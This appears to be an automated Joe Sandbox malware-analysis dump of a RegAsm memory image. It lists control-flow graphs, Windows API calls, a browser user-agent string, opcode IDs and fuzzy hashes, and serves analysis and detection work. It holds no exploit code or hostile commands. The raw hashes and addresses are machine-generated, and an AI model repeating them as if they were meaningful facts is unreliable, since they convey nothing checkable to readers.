                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CB12274A00245AFDF10CFA8C8A5BBD7FB1FF59305F24414AE805AB292CB71994ACF60

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 6498 432b60-432b86 call 4150c0 call 432880 6503 432d3a 6498->6503 6504 432b8c-432bda call 414d00 call 416d40 6498->6504 6506 432d3c-432d3f 6503->6506 6510 432be2 6504->6510 6511 432bdc-432be0 6504->6511 6512 432be6-432bec 6510->6512 6511->6512 6513 432c26-432c34 call 4141f0 6512->6513 6514 432bee-432c21 call 414190 call 540290 6512->6514 6518 432c39-432c54 call 414120 6513->6518 6514->6506 6523 432c5a-432c6a 6518->6523 6524 432d0e-432d37 call 414190 call 540290 6518->6524 6523->6524 6525 432c70-432c7f 6523->6525 6524->6503 6528 432ca3-432cb3 6525->6528 6529 432c81-432c90 6525->6529 6532 432cb5-432cc5 6528->6532 6533 432cd9-432d0c call 414190 call 540290 6528->6533 6529->6528 6531 432c92-432ca1 6529->6531 6531->6524 6531->6528 6532->6533 6535 432cc7-432cd7 6532->6535 6533->6506 6535->6524 6535->6533
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00432880: __aulldiv.LIBCMT ref: 0043293C
                                                                                                                                                                                                                                            • Part of subcall function 00416D40: std::ios_base::clear.LIBCPMTD ref: 00416E67
                                                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00432C16
                                                                                                                                                                                                                                            • Part of subcall function 004141F0: std::ios_base::clear.LIBCPMTD ref: 00414372
                                                                                                                                                                                                                                            • Part of subcall function 00414120: std::ios_base::clear.LIBCPMTD ref: 0041417E
                                                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00432D01
                                                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00432D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Ios_base_dtorstd::ios_base::_std::ios_base::clear$__aulldiv
                                                                                                                                                                                                                                          • String ID: `XA$`@
                                                                                                                                                                                                                                          • API String ID: 3845869555-3161672447
                                                                                                                                                                                                                                          • Opcode ID: 3be4e94092fbc97bf5c2871780405c665e384c0e12239df973384683e768a773
                                                                                                                                                                                                                                          • Instruction ID: f157f0d26c0302d6d38241ffe430d893d0c54141c1b3792623e3cbfa9e0c2486
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3be4e94092fbc97bf5c2871780405c665e384c0e12239df973384683e768a773
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2051E8B0A042484BDF04DFA4D5957FEBFB1AF46300F20506AD5056B391D7B99E80CB94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID: D6&$eks$j3l6lrek
                                                                                                                                                                                                                                          • API String ID: 3732870572-3526828890
                                                                                                                                                                                                                                          • Opcode ID: 2297a6ffd8f4ec993b45158238e90fa18b51a7cdad4546fbc05d04158f687d45
                                                                                                                                                                                                                                          • Instruction ID: c84ca28e98123b79676576f89e03ed95eb2bf0e324ecca63c0ae73cc3441d6ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2297a6ffd8f4ec993b45158238e90fa18b51a7cdad4546fbc05d04158f687d45
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EA113B0D042589FDB24DFA9C990BEEBBB1BF48304F1081AAD409BB341DB746A85CF55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _memcpy_s
                                                                                                                                                                                                                                          • String ID: HHA$HHA
                                                                                                                                                                                                                                          • API String ID: 2001391462-78794114
                                                                                                                                                                                                                                          • Opcode ID: 74668efbd1ad1cf4a97c819f50880fbb537218c607c405c9a8d61c719d73c093
                                                                                                                                                                                                                                          • Instruction ID: 347e595dd39205f2bc9de3d43aec5eb327ea2cfb6b9896bcba43d2fe8e904ad1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74668efbd1ad1cf4a97c819f50880fbb537218c607c405c9a8d61c719d73c093
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE517CB5D02209EBDF04DF94D849AEF77B5BF44304F14842AE81597381D338EAA1CB66
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36, xrefs: 0050CFF8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          • API String ID: 0-1672990099
                                                                                                                                                                                                                                          • Opcode ID: 22ac8b770a0c5b5ade4f012e70590c874fee75a44238219b1bd8116c53655f3c
                                                                                                                                                                                                                                          • Instruction ID: f93c088db4f20a7e8dad6e9c5f3f14d83450d20c26dbc89e4a15c216d380c2bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22ac8b770a0c5b5ade4f012e70590c874fee75a44238219b1bd8116c53655f3c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F51D3B4E00209ABDB08DFD9D895BEEBBF5BF89304F108119E915A7384D7346A41CF90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::ios_base::clear.LIBCPMTD ref: 00416E67
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::ios_base::clear
                                                                                                                                                                                                                                          • String ID: WA$`XA
                                                                                                                                                                                                                                          • API String ID: 1443086396-855112263
                                                                                                                                                                                                                                          • Opcode ID: fd6d3b38f9fdb5634df08d7e797737518ec3e3351e89a693b8f25bb325a5dc12
                                                                                                                                                                                                                                          • Instruction ID: e51bc9c54a42b8ef1cd12b3b9bd65c72ed8b49a9321af47167c83bb76f7294a1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd6d3b38f9fdb5634df08d7e797737518ec3e3351e89a693b8f25bb325a5dc12
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2241E874A04209EFDB04CF99C891BAEBBB1FF88304F108199E5456B391C775AE81CF94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID: -1L$-2L
                                                                                                                                                                                                                                          • API String ID: 1452528299-3975959154
                                                                                                                                                                                                                                          • Opcode ID: d906eacbf53bd6ea69bf6e5ba00ac1b5de07542a0e1b8c7bc0926cbd86bdfdf0
                                                                                                                                                                                                                                          • Instruction ID: 70aacba8afa5fca2be74a231ee15d976f3b6a6c99dc4215d1cbc0018f8aaf362
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d906eacbf53bd6ea69bf6e5ba00ac1b5de07542a0e1b8c7bc0926cbd86bdfdf0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B510770E0020DAFDF14DFA9D896AEEBBB1FF48300F108559E505AB390DB74AA45CB94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000001), ref: 0041F8D4
                                                                                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 0041F8F2
                                                                                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 0041F91B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _com_issue_error$AllocString
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 245909816-0
                                                                                                                                                                                                                                          • Opcode ID: 60f96119b3f1f1225493a60fcb554a1f2a65cb0d002695143f2e4972317d4efb
                                                                                                                                                                                                                                          • Instruction ID: 65e3a0a1e415d60e8b2d00511d3e314293ad63d9ec2b3dcbed55108a80a78f6b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60f96119b3f1f1225493a60fcb554a1f2a65cb0d002695143f2e4972317d4efb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F11D7B4D00208FFDB00EF94C549B9DBBB1EF44304F2081A9E8096B391D779AE89DB85
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00550468,00000000,0054BD3A,?,?,8341C89B,0054BD3A,?), ref: 0055047F
                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00550468,00000000,0054BD3A,?,?,8341C89B,0054BD3A,?), ref: 00550486
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00550498
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                          • Opcode ID: 1be82f418c8225fefb6aeb59f33d53f3388f4d89d608f9ef7fe15704087c396f
                                                                                                                                                                                                                                          • Instruction ID: aa5f3a27579e3a5c9fed78bbcc659cea81a5e218e8ff5e6d7102a2a3e87ec567
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1be82f418c8225fefb6aeb59f33d53f3388f4d89d608f9ef7fe15704087c396f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58D05E31000108FBCF003F64DC0D86D3F29BF80352B408011FE4947172DB728949EA90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0042CAD5
                                                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 0042CC48
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv$CreateDirectory
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1884557851-0
                                                                                                                                                                                                                                          • Opcode ID: d363a749f58416d3daf0585d083070ceb7441d4ace4b4a4f5321a6a3ca3dc230
                                                                                                                                                                                                                                          • Instruction ID: afeadb30498c5ab13120cd22a2933b3bd008f1ae64185923c6379854b51f491d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d363a749f58416d3daf0585d083070ceb7441d4ace4b4a4f5321a6a3ca3dc230
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5A136B1E002189FDB14CFA9D891BEEBBB5FF88304F1480AAE509A7341DB346A45CF55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00558A61: GetConsoleOutputCP.KERNEL32(8341C89B,00000000,00000000,00000000), ref: 00558AC4
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,0000000C,?,00000000,00589A50,00000014,0054FE94,00000000,00000000,00000000), ref: 005594D0
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 005594DA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2915228174-0
                                                                                                                                                                                                                                          • Opcode ID: 201f97af174688d1bfe5719fbeb33e38c261d8ff65e2259391ef7a08be0b4f04
                                                                                                                                                                                                                                          • Instruction ID: dc8fb06cd764f7ca6f03b1cbbda3dabd1d8fa8bfd74c1d61bf9c8262dcc75208
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 201f97af174688d1bfe5719fbeb33e38c261d8ff65e2259391ef7a08be0b4f04
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0619EB180411AEFDF11CFA8C894AEEBFB9BF49305F150546EC04A7252D739D91ADBA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __fread_nolock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2638373210-0
                                                                                                                                                                                                                                          • Opcode ID: d4c02824f7d2cfb2416021d6dbb8b7306e326f2f7caeeaf32d703e0c6b591cd6
                                                                                                                                                                                                                                          • Instruction ID: d074c9bdc53c2ae6e50ed068fe5b00b2a9db18cb2d959dd177b800b6f206c831
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4c02824f7d2cfb2416021d6dbb8b7306e326f2f7caeeaf32d703e0c6b591cd6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6617275A00109EFCB08CF98C594AEEBBB2BF88305F20819AE915A7355D735AE81DF54
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,?,0054BB93,?,?,?,?,?), ref: 0054BC0D
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0054BB93,?,?,?,?,?,00589670,00000018,0054BD64,?,?,?,?,?), ref: 0054BC1A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                          • Opcode ID: bcfffc708b122c39ba56ae591e9166d9c0b0d94b574a4d1f27eeb6ad8e47f9c0
                                                                                                                                                                                                                                          • Instruction ID: ef7a8fef63b71a44ed52422d52d87043f3a7a095563021ebdcfa11457343129a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcfffc708b122c39ba56ae591e9166d9c0b0d94b574a4d1f27eeb6ad8e47f9c0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68012632610155AFDF058F6ADC49DEE3F29FB95338B240209F841DB190EB71ED419B90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,0055FFB4,0041C3C8,00000000,0041C3C8,?,00560255,0041C3C8,00000007,0041C3C8,?,0056084A,0041C3C8,0041C3C8), ref: 0055B437
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(0041C3C8,?,0055FFB4,0041C3C8,00000000,0041C3C8,?,00560255,0041C3C8,00000007,0041C3C8,?,0056084A,0041C3C8,0041C3C8), ref: 0055B442
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                          • Opcode ID: 6ea4651e377bff4be0b0e1f2cdf3dfd4f67a693199816d5ecf9c0c93f271283d
                                                                                                                                                                                                                                          • Instruction ID: 924246b360743d5adec2253e11b7e0ed1fd4fefad911080028757f78698ee344
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ea4651e377bff4be0b0e1f2cdf3dfd4f67a693199816d5ecf9c0c93f271283d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FE08632101605EBDF112BA4EC0DBAD3F59BB50395F154061FA08861A1C7708958DBD0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,CF830579,?,005588A8,00000000,CF830579,00589A30,0000000C,00558964,0054F89D,?), ref: 00558A17
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,005588A8,00000000,CF830579,00589A30,0000000C,00558964,0054F89D,?), ref: 00558A21
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                                          • Opcode ID: ba4073fe59c0273cf0a43eeaadb8b5787e977135eb764b88650cbd609ff65dc6
                                                                                                                                                                                                                                          • Instruction ID: 34048f49f0682552de953bb14b7ec8d2ae5005c56339cee503352dc134d993b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba4073fe59c0273cf0a43eeaadb8b5787e977135eb764b88650cbd609ff65dc6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 531125336052105EEA255274FC6AB7E3F5A7B82736F29070BED08AB1D1DE609C8C8192
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d5d8246fbb80c73fa88ba40215bc667caab47cd58235473b3f20f7f2a33f4f39
                                                                                                                                                                                                                                          • Instruction ID: c29b62008b346feeada97876dac7d8e6a4ce1a8194132e313afe00ddb716d566
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5d8246fbb80c73fa88ba40215bc667caab47cd58235473b3f20f7f2a33f4f39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7651A279A04108AFDF14CF5CCC89AE97FB1BF99318F248169E8499B252D3B19E41CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::ios_base::clear.LIBCPMTD ref: 00414372
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::ios_base::clear
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1443086396-0
                                                                                                                                                                                                                                          • Opcode ID: ae5f2f26c0d599025e0ca97d8b441c5013cb85f58257f6b57f861b0c9ea29069
                                                                                                                                                                                                                                          • Instruction ID: 116015eaf527f0b1982685d10685c49746b35df47215dc5781f667e9ddf383d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae5f2f26c0d599025e0ca97d8b441c5013cb85f58257f6b57f861b0c9ea29069
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1151AEB4E04209DFCB04CF99D490AEEFBB1BF88310F24815AE915AB395C734A981CF94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00432E1A
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireRelease$ConditionCurrentDirectoryVariableWake
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 350265564-0
                                                                                                                                                                                                                                          • Opcode ID: d3b02b5b284cb5dd2e966d2a4cc69f6c888f9dd2ced5d1ac043a0dbc18efadac
                                                                                                                                                                                                                                          • Instruction ID: 45b6f63da3570923d1b3c5de4e04317714a7cb2b42decc6fec9e84e6155ee68e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3b02b5b284cb5dd2e966d2a4cc69f6c888f9dd2ced5d1ac043a0dbc18efadac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2521A074D0020DDFCF04DFA5C9859AEBBB1FF89304F14816AE80227355D735A945CBA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetUserGeoID.KERNEL32(00000010), ref: 0042DC60
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: User
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 765557111-0
                                                                                                                                                                                                                                          • Opcode ID: a6fb5dde44e82a892966d922d239ed6aa50bc4b3ced1092f4f90dd0ec7baa49b
                                                                                                                                                                                                                                          • Instruction ID: 645dd8e041fc49f5174826ac0665943c5158fa6918f172bb6735418e1974a661
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6fb5dde44e82a892966d922d239ed6aa50bc4b3ced1092f4f90dd0ec7baa49b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9811C9B9E40209FFEF00DFE4D846BAEBB74FB88700F104559EA14A7381D6716A00DB95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 0041D967
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                                                                                          • Opcode ID: 4d961e926de3f608138ec2d746d7007bbd1f9dde6943df31f11f7c7b4338fe8d
                                                                                                                                                                                                                                          • Instruction ID: 869ab5568682ad15e99302d89ec85c8ee2891bf7aac97ea4cf070d32e3229af5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d961e926de3f608138ec2d746d7007bbd1f9dde6943df31f11f7c7b4338fe8d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F031F0D1010CABCB04EFA8C48569EFBB5EF44344F1081AAE80597394E2349E81DB85
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 00506C9D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                                                                                          • Opcode ID: 73b47f7bd07e15f5c199576c6bc464965e74fbdd8e6b8335aeaa1fce58ab3641
